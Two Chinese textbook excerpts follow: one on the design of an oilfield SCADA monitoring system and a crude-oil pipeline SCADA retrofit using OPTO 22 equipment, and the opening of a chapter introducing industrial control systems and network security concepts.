根据油田自动化系统设计要求,整个油田计算机监控系统需要建立中心控制室并预留今后建设的基地控制室,通过Internet可以远程实时查询生产数据。在中心控制室和基地控制室分别建立局域网,并通过远程联网技术将两个局域网互联。根据中心控制室与基地控制室的地理分布位置及现有通信条件,设计采用以光纤通信实现高速率的网络互联。系统建设完成后,前方控制室可实现无人值守,操作人员可以在基地中心控制室对油田的生产进行监控和管理。 中心控制室网络均采用以网络交换机为中心的星形结构,为保证网络的可靠性,网络所有设备均有冗余。油田计算机监控系统的总体结构如图9.25所示。 图9.25 油田计算机监控系统结构图 整个系统是集散控制结构,下位机主要是两类设备,即采油机控制器和油井计量控制器。上位机由SCADA服务器、计算机操作站、数据库服务器、网络和通信设备等组成;上、下位机通信采用数传电台。 2.SCADA服务器 在油田中心控制室装有两台互为热备份的SCADA服务器,它负责数据的采集、控制和处理。采用CAMPAQ 570服务器,Windows 2000 Server操作系统,运行iFIX SCADA Server工控组态软件。 SCADA服务器是系统的核心,内装iFIX系统组态(SCU)文件,安全保护组态文件和历史数据文件。通过数传电台来进行数据的采集和管理,两台服务器为冗余设置,当第一台服务器工作时,第二台处于热备份状态。如果第一台服务器出现故障,则iFIX SCADA网络软件自动启动第二台服务器进行数据采集,以保证数据不会丢失。 3.数据库服务器 在基地控制室装有一台数据库服务器,负责历史数据的存放和各种统计报表数据的处理。采用SUN 3800服务器,UNIX操作系统,运行Oracle9.i for UNIX数据库。数据服务器配备磁带机,定期备份数据,万一出现服务器故障时,可使用磁带机的单键恢复的功能恢复系统数据。 4.微机工作站 在中心控制室和基地控制室均装有数台微机工作站,作为作业区自动化系统的操作站。所有工作站均采用HP VL800微机,运行Windows 2000 Professional操作系统,装有各种应用软件。 工作站是操作员对系统参数、工作状态进行监视的节点,通过工作站,操作员可及时了解生产运行状况。同时工作站也是工程师进行系统组态、管理和维护的节点,工程师登录后可对系统功能做相应组态、分析和修改。 9.3.2 油田中心控制室软件描述 1.软件系统结构 系统软件使用Windows 2000平台,安装在SCADA系统的操作站、历史数据服务器、主备SCADA服务器中,主要是考虑到该操作系统在工业控制中使用的安全性和可靠性,保证整个系统的稳定性。数据库软件选用Oracle9.i,安装在系统历史数据服务器中,完成系统的历史数据的存储、记录等。 应用软件的核心是采用GE公司的iFIX 组态软件开发的人机界面和管理系统,它完成数据采集、处理、监控、报警管理等功能。油田现场下位机采用安控ECHO5000系列RTU和油田控制器(RPC),所以配置了安控公司自行开发的这两个下位机设备的接口驱动软件。系统还配置了安控公司ECHO监控仿真软件,实现RPC、RTU的远程异地小键盘操作和示功图采集等功能。ECHO油田管理系统软件对整个SCADA系统的数据提供了安全、详细的数据库管理。ECHO油井示功图分析软件根据采集的示功图数据能够对抽油井的工作状态做出准确的分析,并输出专业报告和图形。 iFIX软件中的iFIX SQL/ODBC模块能方便地将iFIX SCADA实时数据库中的实时数据插入ORACLE历史数据库中。 整个系统的软件结构如图9.26所示。 图9.26 油田SCADA系统软件结构图 2.SCADA系统功能 SCADA系统的主要功能有: · 数据采集:从现场获得数据并将它们加工成可利用的形式。 · 数据处理:将采集到的数据进行处理并传送给需要这些数据的程序。 · 监视:将现场的数据以数字、文字、图形等格式实时显示给操作员。 · 监控:在监测实时数据的同时,由操作员改变设定和由计算机直接改变关键值的能力。 · 报警:能够识别异常事件并立即报告这些事件。 · 控制:自动实现采油机控制。它比监控更高一级,不需要人的直接参与。 · 报表:向用户提供了存取iFIX SCADA数据的功能,用户可生成详尽的报表。 · 安全保护功能:为了保证整个SCADA系统安全可靠的运行,iFIX设立了安全功能。系统管理员可以在节点上设置安全保护,操作人员必须在输入自己的登录名和口令后,方能进入系统。不同的登录人有不同的安全账户,在每个账户里,系统管理员给予指定功能权限,登录后只能使用自己账户中列出的功能。 3.其他管理子系统 在SCADA系统的操作站、历史数据服务器、主备SCADA服务器上分别安装Windows 2000 Server操作系统。组态软件采用iFIX2.6,该软件包中包含 SCADA I/O Server、RuntimeView Client、SQL/ODBC Blocks等, SCADA I/O Server安装在主备SCADA服务器中,用于给整个系统提供实时数据和系统开发维护等,Runtime View Client安装在操作站中,完成对系统中井口、计量站等生产的监控操作,SQL/ODBC Blocks用于提供数据的连接服务。系统数据库选用Oracle9.i,安装在系统历史数据服务器中,完成系统的历史数据的存储记录和开发。 中心控制站除了由iFIX开发的SCADA应用软件外,还开发了一些面向油田管理、分析与应用的子系统软件,它们运行在分析与管理计算机上。这些子系统包括以下几个。 1)ECHO监控仿真子系统 · 抽油井监测和控制:抽油机根据设定的工作点实现自动控制,监测需要的生产数据,小键盘远程遥控操作,遥控抽油机的启停,在线采集示功图。 · 自喷井监测和控制:监测需要的生产数据,小键盘远程遥控操作。 · 水源井监测和控制:监测需要的生产数据,小键盘远程遥控操作,遥控阀门的开关和泵的启停。 · 联合站监测和控制:监测联合站系统生产数据、动态流程图显示联合站生产工艺。 · 报警管理系统:多种报警级别,按物理位置或类型查询报警信息、多媒体技术报警、在线打印报警信息、存储报警历史信息。 · 井口、计量站数量可任意增减,无数量限制。 2)ECHO计量子系统 · 自动排序选井模块:完成油井井号的选择及决定单井的计量时间。实现油井油、气、水三相自动计量。 · 计量过程监视模块:实时监控计量站中各单井阀位状态、计量状态、计时等。 · 计量结果显示模块:显示计量结果。 · 计量结果存储模块:将产液量、产油量、产气量、含水值、气油比等数据存入实时数据库和历史数据库。 · 遥控计量站倒井阀和压油阀。 3)ECHO报表输出系统 · 报表输出:将统计分析或查询的结果进行输出,包括打印机输出、文件输出等。文件输出可以根据不同的需要形成不同的文件格式,如文本格式、HTML格式、Microsoft EXCEL格式等。 · 统计图输出:针对各种统计分析结果,除生成相应的报表外,根据需要还可生成相应的曲线图、饼图、直方图等。 4)ECHO数据分析系统 · 查询统计:通过输入时间、井号等查询条件,查询相关的监控参数及计量结果等数据,并可以打印出查询结果。查询结果以文字、图形、表格等方式表示。查询功能可面向自动化管理人员、生产人员及领导等,并根据不同的查询人员确定其不同的查询范围。 · 统计分析:可以根据用户的要求生成各类统计报表、各类趋势图等。对一定时期内的各种历史数据进行统计及分析。 5)ECHO油田管理系统 系统结构是基于客户机/服务器的体系结构。它的后台采用的是Oracle9.i关系型数据库系统,前端是采用Delphi开发的运行在UNIX环境下的应用程序,具有良好的人机图形交互界面。具有以下主要功能: · 数据采集:从SCADA实时数据库系统中读取监控参数和计量结果到ECHODMS系统的数据库中,便于以后对这些数据进行查询、统计以及趋势分析等处理工作。 · 数据维护:为了便于系统能进行完整的统计和分析,针对有些数据无法直接从SCADA系统中采集到的问题,系统提供了人工数据录入的功能。具有数据增加、删除和修改的功能。 · 数据接口:系统提供一些相关数据接口,可以为本系统同其他处理软件或分析软件进行数据交换。该数据接口通过数据交换,可以保证一些老的软件系统继续使用。 · 操作员及日志管理:对使用该软件的操作人员进行管理,可以增加和删除操作员,修改指定操作员的操作权限。可以对系统的运行情况进行自动记录等。该功能可以增加软件的安全性。 · 系统参数维护:设置系统运行时的参数,比如系统自动备份时间、数据保留期限、多长时间存储一个参数、存储多长时间等。另外系统还具有诸如根据实时数据库的记录内容自动增加新井和删除报废井的自动维护功能。 6)ECHO油井示功图分析软件 ECHO油井示功图分析软件采用了专家系统和模式识别技术,根据采集的示功图数据能够在线对抽油井的工作状态做出准确的分析,可以自动诊断出油井的沙卡、掉杆、结蜡等故障,并能输出专家报告和图形。 9.3.3 抽油机现场控制器 抽油井是油田重要的组成部分,油田产量绝大部分来自抽油井。对抽油井的工作状况进行准确、及时的分析与掌握,保证抽油机的稳定运行,是实现油田生产自动化的重要目的之一。因此,如何选择一个好的抽油机控制器,是能否建立一套良好的油田生产自动化系统的关键,也是目前国内外众多厂家亟待解决的一个重要课题。 1. 抽油机控制器的功能要求 (1)抽油机控制器必须具备如下基本功能: · 抽油机的自动启停控制、空抽控制、负荷超限控制等。 · 示功图的采集和现场在线显示。 · 采集电机工作的三相电流和电压,采集和显示电流图。 · 现场控制抽油机的启停,现场设定控制参数。 · 远程遥控抽油机的启停,远程设定控制参数。 · 油压、套压、回压、油温的监测。 · 根据现场情况的不同,还应考虑控制器的防护、防盗功能。 (2)性能稳定,工作可靠。由于油田特殊的地理环境和恶劣的气候条件,以及地广人稀的特点,可靠性成为选择抽油井控制器的最重要的前提条件。 (3)可操作性强。抽油井控制器作为一个独立的远程控制终端,应具备好的可操作性。其中重要的一点就是能够自主工作,以保证在系统由于通信等原因失控时能正常运转。 (4)可维护性强。油田井站众多,而维护人员相对较少,因此对自动化设备的维护要求简单、方便,否则会为用户带来很多不便。 (5)良好的性能价格比。有些产品性能优良,但造价昂贵;有些产品造价便宜,但性能不可靠,潜在的维护费用高。因此,选择能够满足功能要求且具有最佳性能价格比的产品十分重要。 (6)支持标准的通信协议。随着计算机软硬件技术的蓬勃发展,高品质、高性能的自动化产品越来越多,而如何集各家之长,组成一个最优的自动化系统,便成为一个非常重要的任务。解决这个问题的最好方法就是选用具有标准通信协议的产品。 2. ECHO 5309抽油机控制器 ECHO 5309型抽油机控制器由控制器和保护箱组成,结合负荷、位移传感器及多种现场仪表可实现示功图、电流图的采集,井口油压、套压、回压、油温的检测,抽油机电机电压、电流等参数的监控,并且支持无线负荷/位移传感器、无线压力传感器、无线温度传感器的接入,方便现场施工、维护。控制器既可联入控制网络实现远程遥测、遥控,也可独立工作完成各项功能。保护箱分为防雨遮阳罩、仪器箱两部分,为单箱体、单开门结构。保护箱可起到防雨、防晒、防尘的作用。抽油机控制器内部结构如图9.27所示,其主要性能指标见表9.9。抽油机现场安装原理图如图9.28所示。 图9.27 抽油机控制器结构 图9.28 抽油机控制器现场安装示意图 表9.9 ECHO 5309型抽油机控制器主要性能指标 3.ECHO 5309型抽油机控制器主要功能 ECHO 5309抽油机控制器技术特点有以下9个方面: (1)结构合理,可直接应用于工业现场—完备的供电、检测、控制、操作、安装、防护设计,用户无需二次配置;外加保护箱,很好地起到了防雨、防晒、防尘的作用。 (2)配置合理,具有很强的现场适应能力—具有AI、DI、DO、RTD等多种类型的输入、输出信号;具有24V仪表电源输出,可直接接入两线制仪表;可检测负荷、油压、套压、回压、油温、电机电压、电机电流、启停状态等不同类型的信号;可满足开关、报警、紧急停车等不同类型的控制要求。 (3)故障主动上报功能—支持故障主动上报功能,更迅速地反应现场的故障,及时处理,减少损失。 (4)用户二次编程功能—支持用户采用符合IEC 61131-3标准的编程软件OpenPCS进行二次编程,方便用户对特殊井口采集、控制的更改,更快地适应井口监控的需要。 (5)无线仪表接入功能—支持无线仪表接入功能,方便现场施工及维护工作。可以同时接入无线示功仪、无线油压、无线套压、无线温度等仪表,适应油田井口采集需要。 (6)灵活的通信方式,标准的通信协议,可方便地组成SCADA系统—提供3路对外串行接口、1路以太网接口;可配接无线网桥、数传电台、GPRS DTU等多种远程通信设备;支持标准的Modbus RTU、ECHO 4100协议。 (7)现场监控和远程监控兼备,为系统操作、诊断、维护和升级提供了方便—控制器可作为控制系统中的一个站点联网工作,也可独立运行完成各项功能;通过手操器可现场设定控制器参数,也可远程设定,参数可组态;控制器程序可实现现场下载,软件升级容易。 (8)工业标准设计,能够工作于各种恶劣环境—内部器件均选用优秀的工业级产品;具有很好的温度特性,可在恶劣环境下工作。使用温度可达-40℃~70℃;产品通过EMC电磁兼容性试验3级测试。 (9)充分的可靠性设计,严格的质量检验,为用户提供了可靠的保证—电源、信号入出口均有保护措施,并与主控电路隔离;具有看门狗及数据掉电保护功能,可长期保存设定参数及历史数据;产品的研制、生产、检验严格按照ISO 9001质量体系标准进行。 9.3.4 油井自动计量控制器 计量站是油田的重要组成部分。计量站生产担负着站内各个油井的液、油、气三相计量任务,需要及时、准确地为油田地质部门提供油藏工程资料。然而,目前我国很多油田计量站仍然采用人工计量方式,采用工人三班工作制,劳动强度大,效率低。同时,人工计量是间歇不连续的,计量次数少、时间短,再加上大部分油井间出、原油含水较高,所以计量结果代表性差,不能为油藏工程提供真实可靠的资料。 ECHO 5401自动计量控制器选用安控先进的主控制器和I/O模块,硬件采用模块式结构,提高系统的可靠性、可扩展性,易于选型、维护和扩展。在基本配置的基础上,可根据现场监控的需要,选配人机界面、打印机、电台、UPS等设备,以及配置选井控制箱为计量站内的电动执行机构供电。ECHO 5401自动计量控制器的技术特点表现在以下7个方面: (1)硬件扩展功能—硬件采用模块式结构,可根据现场计量油井、注水井的数量扩展I/O点数,以及根据功能需要扩展人机界面、打印机、通信设备等。 (2)通信接口功能—控制器具有RS-232、RS-485、TCP/IP等多种通信方式,采用标准、开放的通信协议,可与中控室之间实现计量站采集数据上传、计量结果上传和中控室参数设置的下传等远程操作,从而使计量站实现无人值守。联网通信能力使其几乎能与所有的服务器软件兼容,如Lookout、iFIX、Genesis、Intouch、Onspec等,易于接入或组成SCADA系统。 (3)MMI接口功能—主控制器可连接多种人机界面,如工业显示屏、触摸屏等作为标准配置。通过人机界面和键盘可实现现场计量操作和参数设置,成为可独立工作的一体化计量控制器,不需要上位机或中控室即可单独实现一座计量站的自动计量监控。MMI接口不连接人机界面时,也可作为现场数据接口,维护人员能够通过数据接口,在现场用便携机对控制器进行检测和维护。 (4)现场操作功能—通过计量控制器的人机界面或现场数据接口,可实现现场计量操作和参数设置,便于调试、使用和维护。人机界面采用图形LCD显示,全中文菜单操作界面,易学易懂。 (5)编程环境—主控制器采用IEC 61131-3标准的编程软件OpenPCS,支持LD、FBD、IL、ST、SFC五种编程,还支持C语言编程。 (6)数据断电保持—主控制器装有后备电池,可保证控制器掉电后长时间不丢失数据,用于存储参数设置、计量结果等。 (7)可靠性高—采用先进的主控制器,具备优良的通信能力和大容量的存储器,配置工业级、模块化的电源和人机界面,性能稳定、可靠,安装方便、操作简单、可维护性强,适用于恶劣工况。 ECHO 5401自动计量控制器的系统功能有6项: (1)实时监测功能—实时监测油田计量站的全部生产数据,如计量间、配水间、水套炉间的温度、压力、液位、天然气浓度、含水率、注水流量等数据。 (2)计量计算功能—计量过程结束后,根据计量有效时间、原油和天然气流量累计、含水率情况,自动计算出液、油、气、水的日产量。 (3)倒井控制功能—根据现场控制器人机界面操作命令或中控室远程操作命令,自动将某一个或多个油井切换到计量位,并启动计量。 (4)计量流程控制功能—某一个或多个油井切换到计量位后,实时采集原油流量、含水率、天然气流量,完成一定时间的计量。 (5)报警与联锁功能—数据采集点报警,如液位高报警、天然气浓度高报警等;设备故障报警,如电动阀故障判断与报警、加热炉火焰监测与报警等;计量流程异常报警如压油时间超长报警、站内断电报警等;危险报警点可与设备联动,实现联锁控制。 (6)计量历史数据功能—v控制器可独立工作,并可存储数百条历史计量数据,供查询和打印。 9.4 原油输送管线SCADA系统设计与开发 9.4.1 概述 某原油输送管线东起中原油田濮阳首站,西至洛阳末站,中间经滑县泵站、卫辉泵站、新乡泵站、武陟泵站、温县泵站共5个中间站,全长255公里,采用油罐—泵—油罐的输送方式,每年输送250 万吨原油。以往原油的生产管理方式是用一台8通道无纸记录仪记录泵站内的生产参数,以人工方式启停泵。值班人员将生产运行和设备的使用情况用电话告知新乡调度中心,而徐州输油管理局只能通过打电话方式才能了解该原油输道管线的运行状况。随着国内石油化工行业的飞速发展,该输送管线已无法满足需求,因此决定实施SCADA 系统改造以全面提高生产和管理运行水平。改造后的SCADA系统包括7个分站、1个地区调度中心和1个管理中心。系统软、硬件设备选用美国OPTO 22公司的SCADA系统解决方案。 美国OPTO 22公司始建于1974年,是一家全球技术领先的自动化测控系统制造商。其产品应用于数据采集,企业管理,远程监视与控制,工业自动化等领域。OPTO 22是较早就开始提供用网络、计算机与控制设备并实现它们联网的公司之一,在近30年的自动化技术发展的各个阶段中,领先性的提出及推广了许多标准或技术。如它是OPC规范的最早发起公司之一;第一套基于计算机控制的光隔模拟量系统;率先在测控领域引入工业以太网等等。目前,世界上有超过10000万点的设备与OPTO 22系统相连接。 9.4.2 OPTO 22 SCADA系统解决方案 SCADA系统开发,包括上位机程序开发、下位机程序开发及通信系统开发。在程序开发中,特别是关系到上、下位机通信的参数,要在上、下位机中分别定义。例如,现场有一个电机设备,为了监控这个设备,现场的I/O信号包括3个DI,即电机允许自动、电机运行与电机故障和1个DO即电机开启。在下位机编程时,要为这些变量定义标签,然后定义的这些标签在下位机编程中就可以使用。为了在上位机中了解这个设备的状态,同时实现对它的监控,必须把3个DI信号采集到上位机中,这时在上位机中要定义3个变量,这些变量要定义为I/O变量,其地址就是与下位机中定义标签时同样的地址。显然,同样的一个设备监控,相关的变量要在上、下位机中定义两次,这一方面增加了工作量,又容易导致出错。一旦下位机中地址有了更改,上位机中也必须更改,否则上位机中的信息就不正确。由于SCADA系统开发中常采用不同厂家的软、硬件产品集成,因此,这些产品之间的集成度并不高,这样的工作很难避免。 作为一个完整的SCADA系统解决方案,应该包括完整的上位机、下位机及其软件。下位机硬件应配套用于编程的集成化开发环境,处理所有与控制程序相关的对应软件,例如编辑、编译、调试;而上位机软件应该包括人机界面以及其他功能的程序。如果软、硬件产品由一个公司开发,通常这些软件内部底层的协同性将帮助用户提高控制系统整体的运行效率,并节省大量的开发时间。此外,可以实现共享标签(变量)技术的应用,即用户创建的对象名或者定义能够直接应用于其他软件工具集。例如,如果工程师在下位机控制软件开发环境中定义了字符串变量,那么该定义可直接被用于人机界面软件开发。如果在下位机编程环境中定义了数字I/O点,那么在配置OPC数据通信时,该定义也将会自动出现。由于所有这些定义的标签都保存在唯一的数据库中,开发人员就无需在各种应用中重复输入大量名字,也无需关注和维护其标签列表对应的一致性。这样,控制任务的开发就变得更为简单、高效且不易出错。 OPTO的SCADA系统解决方案可以降低构建自动化系统的复杂度,该系统包括4个集成的部分: · SNAP PAC控制器。 · PAC Project软件平台。 · SNAP PAC智能处理器。 · SNAP I/O。 1.OPTO 22 SCADA系统硬件架构与特点 新一代的SNAP PAC控制器系列整合了高速多任务处理器,冗余以太网,大容量内存,多种通信接口等功能,把硬件的可靠性与高性能完美地结合在一起。相对PLC来说,能够无需扩展模块或子系统即可胜任多种复杂对象处理或控制任务。 对于OPTO系统,其硬件系统特点还体现在其I/O和智能处理器层。OPTO的智能处理器(Brain)功能上类似于SCADA系统中常用的RTU,但是除了具备RTU多种通信协议支持、环境适应能力强的特点外,其优势在于多种任务执行能力。比如,PID回路控制、顺序事件记录SOE、报警处理、高速计数和脉冲输出等。对于SCADA系统来说,回路控制或者是SOE往往是其整个系统最关键的任务,即使控制器和上位服务器系统发生故障,也不会影响到这些已经预设好的核心任务的执行,这样相对于传统RTU系统,Brain具备更高的可靠性。 同样,OPTO的I/O系统也具备了智能性,能够完成模拟工程单元转换、标定、截取、数字量翻转记录等功能。这些任务虽然计算简单,但是当系统I/O规模增大后,通常会占用很大的控制器处理能力,而OPTO的这种分层的架构将处理器从这些繁杂任务中解放出来,从而提高了系统核心任务执行能力以及稳定性。另一方面,I/O层处理过的数据相对原始数据得到了较大的压缩,从而减小了对网络带宽的占用,提高了网络通信的实时性。 对于智能处理器和I/O级,OPTO对其都进行了特殊涂层处理,从而提高了防潮防腐的能力,使其更适应于工业现场和野外应用环境,而这对于SCADA系统来说又是非常重要的。 1)SNAP PAC过程控制器 高性能SNAP PAC 控制器用于运行各种控制方案,每个控制站设有两套SNAP PAC控制器,互为热备用。OPTO SNAP PAC控制器配备了Motorola 冷火系列高性能CPU,并带浮点处理器,以及大规模内存,这使得SNAP控制器在SCADA应用中,相对于传统的PLC或者RTU来说具备了运行控制任务和控制算法的能力。控制系统由PAC Control软件进行编程,采用多任务流程图加脚本的开发方式。即能更好满足过程控制的需要,又具有开放性好、速度快和多任务特性。能适应从泵站模糊逻辑控制到油量计量等复杂算法,以及对复杂通信协议解析的要求。 2)SNAP I/O 系统 作为OPTO 22 公司新一代的智能模块,每个I/O模块上都带独立的智能芯片,数据采集应用中大量的RTD温度以及流量直接在I/O级实现单元换算、截取标定等任务,而降低了PAC控制器的运算以及系统通信负荷。 I/O端与现场端具有4000V光电隔离,模拟量采集模块有15 位以上的高分辨率,每个模块2~4 路输入/输出,且有状态/故障指示灯,支持热插拔。一旦发生故障,可直接快速更换I/O模块,提供了很好的现场可维护性。所有I/O及处理器模块均采用低功耗设计及涂层封装,保证在恶劣环境下稳定运行。同时,PID 回路控制运算及事件联锁直接在I/O智能底板上运行,即使控制层发生故障,也不影响到这些关键任务的执行,因此具有更好的可靠性。 2.OPTO 22 SCADA系统应用软件 OPTO 22统一的软件平台 PAC Project Suite功能和特性有: · I/O 侦测与控制。 · 实时多任务流程图编程方式。 · 脚本方式支持复杂高级任务开发。 · 动态程序运行诊断。 · 项目工程:管理策略、变量以及硬件设备。 OPTO 22的PAC软件平台(PAC Project软件套件)不仅可以和OPTO 22 SNAP PAC控制器无缝集成,而且还包括了控制程序开发以及组态软件,外加可选的OPC服务器及数据库互联工具,成为SCADA系统开发很好的成套解决方案。用户在创建控制程序(控制策略)时定义的I/O点及变量会被存储到统一的标签名数据库中。当使用组态软件开发环境、OPC服务器或者数据库互联工具时,这些定义的标签随即可用。控制程序开发包含了多领域的功能,包括:数字及模拟控制,PID闭环控制,逻辑和数学运算,字符串处理,日期和定时器,事件/响应,与网络上的分布式I/O通信、对等站及计算机通信,测试及差错处理,运动控制的指令等。所有这些指令都以直观的语言形式应用于基于流程图或者流程图中的脚本方式的控制策略开发过程中。 PAC定义的核心之一在于同样的硬件设备能够跨领域应用,这就要求其对应的软件平台必须具备多领域应用中所要涵盖的控制及监测任务开发能力。作为业内最先使用流程图方式编程的开发环境,PAC Project Suite开发方式更接近于工程师设计系统的思路,程序能够随应用要求而“流动”,其内置的脚本工具更有利于实现较为复杂的控制算法以及通信协议的解析,从而实现离散控制、过程控制、运动控制、SCADA系统等多领域应用。 OPTO的组态软件PAC Display也满足PAC定义的要求,能够同编程环境共享统一的变量标签数据库,同时软件中包含了数据库连接工具,可以无缝的与第三方数据库进行三方互联,这样满足了越来越多的信息管理层直接对自动化底层直接访问的需求。 OPTO 22 PAC软件套件提供功能完备的、高性价比的控制程序,人机界面开发和监控,OPC服务器,以及数据库连接。这些完全集成的软件应用共享统一的标签数据库,因此在PAC Control环境中配置的任何点都能立即被PAC Display、OptoOPCServer及OptoDataLink使用。 OPTO 22 SCADA系统解决方案中的集成软件开发环境如图9.29所示。 图9.29 OPTO 22 SCADA系统解决方案中的集成软件开发环境 9.4.3 原油输送管线SCADA系统设计与开发 1.系统总体结构 该SCADA系统总体结构如图9.30所示。系统硬件采用了OPTO 22公司的SNAP PAC 和I/O系统,软件使用的是与硬件配套的OPTO PAC Project Suite软件,系统运行于Windows NT 4.0平台。新的SCADA系统全面改变了原有的较落后的控制方式,实现了管线超高超低压力的自动保护、自动平衡进出站压力、泵-泵的全密闭输送工艺,使每年输量提高至550万吨。 图9.30 原油输送管线SCADA系统组成 该原油输送管线SCADA系统分为就地控制层、泵站控制层、新乡调度中心远控及徐州管理中心远程监视四级控制模式,如图9.30所示。各分站就地层与站控制层系统通过100Mbps以太网接入站控局域网,而后再采用2Mbps数字与33.6Kbps模拟微波通信相互热备份的方式,接入上级中心,自动向新乡调度中心与徐州管理中心上传各泵站的生产参数及设备运行状况,并接收它们下达的控制指令,自动巡线并能在原油发生泄漏时马上产生报警及精确定位,自动产生管线最优化运行方式的分析报告,可对水击进行分析及预处理,并在发生时实现全线自动保护。 2.现场SCADA分站组成与功能 就地控制层可实现在紧急状态的自动联锁保护停泵,是独立于计算机控制系统之外的保护系统,它包括:管线超高压保护、管线超低压保护、泄漏保护等。 泵站控制层实现对输油泵机组、储罐、进出站管线及阀组、加热炉、清管球收发装置、电气装置等设备的状态监控与报警;具备进出站压力PID 调节、生产设备异常保护与报警;上传生产信息和数据并接受调度中心下达的指令等功能。 分站监控系统间以及与上级中心间可互相通信,但各站系统都是一个独立的控制及管理系统。它们拥有独立的硬盘和内存,有本地的实时和历史数据库,有手动调节及系统自保护功能。根据规模需要,配备控制系统冗余、通信链路冗余以及操作员站冗余。同时,一旦出现站间通信故障,站控控制系统将接管调度中心的控制而进入单站控制模式。 就地控制层与站控层由OPTO SNAP I/O、SNAP PAC控制器、操作员工作站、打印设备、通信设备、防雷设备等组成。全部7 个站控系统共实现模拟量参数采集700 余点;数字量参数采集970余点。每个站控系统架构如图9.31所示。 SNAP控制器通过100Mbps 以太网卡接入站控局域网以及I/O数据采集与控制层。其内置了调制解调器连接协议,以50ms为周期向调度中心发送数据以满足管线泄漏分析所需信息要求。SNAP控制器的编程采用PAC Control Professional,该软件支持多种编程语言,图9.32所示为采用流程图语言编写的泵站控制程序界面。 3.操作员工作站 操作员工作站基于Microsoft Windows NT 4.0 中文操作系统,上面运行OPTO PAC Display人机界面软件。操作员工作站采用灵活简便的人机交互界面,可实现以下功能: · 分级登录。分操作员/系统维护工程师/系统管理员3级,各级用户可在登录后修改自己的登录密码。 · 站控/远控切换。系统管理员可通过远端暂停本站控制,实现远控。 · 用户管理。系统维护工程师可以在登录后,增删操作员用户,同样,系统管理员可对系统维护工程师进行管理。 · 数据保存及自动打印。系统底层数据可通过OPTO Datalink软件自动保存在SQL 数据库中,打印可按用户设定的时间自动打印或人工打印,打印时可选择预览功能。 · 事件管理功能。用户可查看不同时期的报警记录,操作员对泵/阀的操作记录,各种登录记录等。v · 其他泵站数据监视。通过网络可以检测其他泵站的生产参数及运行状况。 此外, 防雷设备站控制系统可以对来自外部供电线路、外部通信线路、油罐高位线路的雷击起保护作用。 4.调度中心 新乡调度中心是对该输道管线生产运行的直接监管者,通过微波系统将各泵站控制层的生产信息和数据集中显示并保存,监视各站的工艺设备、电气设备的运行状况,实现全线密闭输油。同时,可以实现远程启泵、停泵、顺序停输等功能。 调度中心的全线泄漏检测与定位系统可根据管线的压力波分析,对管线泄漏状况进行分析与定位。优化运行系统可以实现全线的生产优化运行。通过对全线压力状况进行计算与模拟,可以分析压力波的变化趋势,对站控层和就地层下达指令,实施水击超前保护,并动态记录保护120分钟以内的压力变化趋势。 新乡调度中心对原油输送管线进行全线集中监控与管理,主要配置包括数据服务器、调度员工作站、泄漏分析工作站、工程师站、打印设备与通信设备等。 调度中心数据数据库服务器是原油输送管线SCADA 系统生产数据管理的核心,它由两台Windows NT 服务器组成,内置两块阵列硬盘,接收并镜像保存各站控系统中的生产数据,接收的实时数据存入实时数据库,同时进行数据的越限检查,产生越限报警等。并将实时数据发送到历史数据库中作为历史数据存档,向应用或开发子系统提供计算和分析的实时数据服务器运行OPTO PAC Display/OPTO OPC Sever/SQL Sever软件,直接从各站控制器交换生产数据。 调度中心调度员操作站运行人机界面,操作人员可以随时了解每个站的操作情况,了解整个输油管线工艺运行和设备状态。调度中心全线概貌人机界面如图所示9.33所示,新乡站主菜单如图9.34所示,出站阀控制界面如图9.35所示。
standards
第一章 绪论 随着工业化和信息化的飞速发展, 工业控制系统(简称工控系统) 产品与信 息技术(IT)的结合日益紧密。为了适应当前工业控制的需求, 提高工厂或公司 运作的效率, 工业控制网络(简称工控网络) 通过各种方式与互联网等公共网络 连接, 病毒、木马等威胁正在向工业控制网络扩散。近年来, 新的工业控制网络 威胁事件不断被披露,工业控制网络安全逐渐成为学术界、工业界关注的热点。 本章将阐述工业控制系统和工业控制网络的基本概念, 并简要介绍工业控制 网络安全领域的现状。 1.1 工业控制系统概述 本节将首先介绍什么是工业控制系统, 并简要介绍工业控制系统的基本架构。 1.1.1 工业控制系统介绍 工业控制系统(Industrial Control System, ICS),是由各种自动化控制组件以 及对实时数据进行采集、监测的过程控制组件, 共同构成的确保工业基础设施自 动化运行、过程控制与监控的业务流程管控系统。工业控制系统通常指的是监视 控制与数据采集系统(Supervisory Control And Data Acquisition, SCADA)、分布式 控制系统(Distributed Control System, DCS)、可编程逻辑控制器(Programmable Logic Controller, PLC)以及过程控制系统(Process Control System, PCS) 1.1.2 工业控制系统架构 一个典型的工业控制系统通常由检测环节、控制环节、执行环节和显示环节 组成。经历多年发展, 工业控制系统在控制规模、控制技术和信息共享方面都有 巨大的变化。在控制规模方面, 工业控制系统由最初的小规模发展成现在的大规 模;在控制技术方面, 工业控制系统由最初的简单控制发展成现代复杂或者先进 控制;在信息共享方面, 工业控制系统由最初的封闭系统发展成现在的开放系统。 通常, 企业会根据自身生产和运行流程搭建符合各自需求的、不同的工业控 制系统, 根据《中华人民共和国公共安全行业标准中的信息安全等级保护工业控 制系统标准》,可以将通用工业企业控制系统的架构按照功能从上至下划分为 5 个逻辑层次: 企业资源层、生产管理层、过程监控层、现场控制层和现场设备层。 企业资源层主要通过 ERP(Enterprise Resource Planning)系统为企业决 策层及员工提供决策运行手段。 生产管理层主要通过 MES(Manufacturing Execution System)系统为企业提供包括制造数据管理,计划排程管理、生产调度管理等管理模块。 过程监控层主要通过分布式 SCADA 系统采集和监控生产过程参数、并利 用 HMI(Human Machine Interface)系统实现人机交互。 现场控制层主要通过 PLC 、DCS/PCS 控制单元和 RTU(Remote Terminal Unit)等进行生产过程的控制。 现场设备层主要通过传感器网络对实际生产过程的数据进行采集, 同时 利用执行器对过程进行操作。 1.2 工业控制网络概述 本节将首先介绍什么是工业控制网络, 并简要对比工业控制网络和传统的 IT 网络。 1.2.1 工业控制网络介绍 目前, 对工业控制网络尚无标准定义。通常将工业控制网络定义为以具有通 信能力的传感器、执行器、测控仪表作为网络节点, 以现场总线或者以太网作为 通信介质, 连接成开放式、数字化、多节点通信, 从而完成测量、控制任务的网 络。 工业控制网络就是工业控制系统中的网络部分, 是一个把工厂中各个生产流 程和自动化控制系统通过各种通信设备组织起来的通信网络。工业控制系统包括 工业控制网络和所有的工业生产设备, 而工业控制网络只侧重工业控制系统中组 成通信网络的元素,包括通信节点(包括上位机、控制器等)、通信网络(包括 现场总线、以太网以及各类无线通信网络等)、通信协议(包括 Modbus,S7comm 等)。 工业控制网络由多个“网络节点”构成, 这些网络节点是指分散在各个生产 